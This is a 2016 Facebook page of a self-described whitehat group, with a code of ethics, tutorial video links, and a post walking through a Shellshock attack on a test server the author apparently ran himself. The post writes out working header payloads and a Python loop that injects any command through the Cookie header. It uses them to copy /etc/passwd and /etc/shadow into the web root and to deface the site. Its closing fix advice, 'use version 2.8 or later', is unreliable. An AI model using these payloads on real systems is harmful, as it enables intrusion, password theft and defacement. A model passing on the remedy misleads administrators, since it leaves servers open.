Finhackers(whitehat group) (whitehat tutorials)

About

We're small group of Ethical Hackers, penetration testers and programmers, we accept members from all around the world, even tough our name is FinHackers. The Hackers Creed (Steven Levy, 1984, Hackers: Heroes of the Computer Revolution) Access to computers - and anything which might teach you something about the way the world works - should be unlimited and total. Always yield to the Hands-On imperative! All information should be free. Mistrust authority - promote decentralization. Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, gender or position. You can create art and beauty on a computer. Computers can change your life for the better. Code of Ethics Respect privacy Serve and protect the community Share knowledge with the community Do not take personal copies of someone else's data Do not perform unauthorized testing Do not discuss findings with unauthorized people Do not publish vulnerabilities without permission Observe all legal requirements Act with integrity Avoid conflicts of interest Avoid FUD (Fear Uncertainty and Doubt) Protect everyones data (encryption etc.) Do not associate with black-hat hackers please, remember the Last line ("Do not associate with black-hat hackers") BEFORE thinking of asking us to help with ur BS..... Current members: The_Emankcin w0lv3rine 3RR0RDUD3 bextpentester hernandocounty Enigma

Links
Owner

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Check us out @ fb https://www.facebook.com/FinHackers/

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Shell upload tutorial By The_Emankcin
https://www.youtube.com/watch?v=i32LVrRXghQ

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Stored XSS attack tutorial by The_Emankcin
https://www.youtube.com/watch?v=kfAmQ0wVANA

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Hello, Just to make sure that everyone understands:
We do NOT teach you anything ! related to Black Hat hacking

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Hello, this is a short story about thing called
Shellshock Bashbug. (spooky)
-----------------------------------------------------------------------------
this data is for educational and legal purposes only.
Illegal use of any kind is forbidden.
Always remember that hacking without permission is illegal.
(never do so)
this is only to show / intro the dangers of bashbug.
-----------------------------------------------------------------------------
So, first, What is this little thing called Bashbug?
Shellshock bashbug is a Linux/unix vulnerability that has been detected last year, It allows attacker to execute shell codes(linux terminal commands, etc.)
VIA carefully crafted HTTP-requests.
So, I decided to set up a vulnerable server, and go to play with it
for a while.
So, after installing vulnerable version of linux to oracle virtualbox,
started testing.
first, send this kinda HTTP-request to server:
GET /index.html HTTP/1.1
Host: xxx.xxx.xxx.xx
Cookie: () { :; }; chmod 777 ../../*
referer: () { :; }; mkdir test ../../var/www/
and then tried this url: xxxxxxxxx/test
Suprisingly, it showed me the /test directory p:
after that, next request:
GET /index.html HTTP/1.1
Host: xxxxxxxx
Cookie: () { :; }; echo "" >> ../../var/www/index.html
Now, going to check HTML at index.html
And Bang! there,. at last line of HTML, text:
so now, I know that I have priviledges to write & read files.
Then, next thing I'm doing is to collect some data from server...
I want to make it faster, so writing a simple python script:
(BTW; cuz of facebook, Identitations not working , Marking whitespace with .)
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("xxx.xx.xxx.38", 80))
send = True
while send == True:
...command = raw_input("Command to execute: ")
...req = ( "GET / HTTP/1.1\r\n",
.............."Host: xxxxxxxxxxxxx\r\n",
..............."Cookie: () { :; }; "+str(command)+"\r\n"
...)
....try:
........s.send(str(req))
....except socket.error:
........print "Can't send the request, shutting down..."
........s.close()
........send = False
then, sending thease commands to server:
cat ../../etc/passwd >> ../../var/www/test/new.txt (creating the new.txt file.)
cat ../../etc/shadow >> ../../var/www/test/new.txt
and now saved the password data to my "real" computer. then modified the code a bit
by adding variable "Deface" to code, with Defacement code, and then this command:
s.send("cat " + str(Deface) + " >> ../../var/www/index.html)
now, the page is defaced, server passwd files are stolen etc, So I would say it's kinda well fuck'd up.
That's all for this time, always remember that if hosting with linux, use version 2.8 or later.
The_Emankcin